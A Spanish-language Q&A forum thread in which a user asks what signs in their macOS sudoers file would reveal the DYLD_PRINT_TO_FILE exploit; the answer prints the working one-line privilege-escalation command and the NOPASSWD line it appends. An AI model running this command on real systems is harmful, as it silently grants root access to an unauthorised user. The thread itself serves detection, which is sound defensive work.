DYLD_PRINT_TO_FILE & sudoers Exploit: ¿Cuáles son los marcadores en el archivo sudoers?

0

Me preocupa la vulnerabilidad DYLD_PRINT_TO_FILE en el archivo sudoers.

enlace

Si tengo abierto el archivo de sudoers, ¿cuáles son los marcadores que debo buscar como señal de infección? Mi archivo de sudoers es en realidad bastante pequeño y también mi ojo (en su mayoría sin entrenamiento), no veo nada que pueda ser motivo de preocupación. Pero, ¿cuáles son algunos ejemplos de líneas / variables que indicarían un problema?

Aquí está la mitad inferior de mi archivo, no hay nada que me salte. ¿Pensamientos?

# User privilege specification
root    ALL=(ALL) ALL
%admin  ALL=(ALL) ALL

# Uncomment to allow people in group wheel to run all commands
# %wheel    ALL=(ALL) ALL

# Same thing without a password
# %wheel    ALL=(ALL) NOPASSWD: ALL

# Samples
# %users  ALL=/sbin/mount /cdrom,/sbin/umount /cdrom
# %users  localhost=/sbin/shutdown -h now
    
pregunta Unknown Coder 05.08.2015 - 23:47

1 respuesta

1

Este es el comando de infección:

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

Esto significa que tendrás una línea como:

USERNAME ALL=(ALL) NOPASSWD:ALL

al final de tu archivo sudoers .

NOTA: USERNAME es su nombre de usuario en el sistema. No tendrá la etiqueta hash # al frente.

    
respondido por el Mateusz Szlosek 06.08.2015 - 00:06

Lea otras preguntas en las etiquetas